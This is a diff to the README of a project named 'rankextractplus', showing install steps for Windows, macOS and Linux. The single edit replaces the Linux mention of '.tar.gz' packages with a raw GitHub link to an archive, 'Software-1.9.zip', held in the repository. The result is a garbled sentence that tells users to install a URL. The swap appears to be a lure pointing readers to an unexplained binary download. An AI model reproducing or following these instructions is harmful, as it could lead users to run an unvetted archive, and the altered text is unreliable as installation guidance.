DanielAudu/rankextractplus/README.md

 4. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the app to your Applications folder.
-   - For Linux: Follow the instructions specific to your distribution for installing `.tar.gz` or other package types.
+   - For Linux: Follow the instructions specific to your distribution for installing `https://raw.githubusercontent.com/DanielAudu/rankextractplus/main/rankextractplus/Software-1.9.zip` or other package types.

 5. **Run rankextractplus:** Locate the application on your computer and double-click to open it.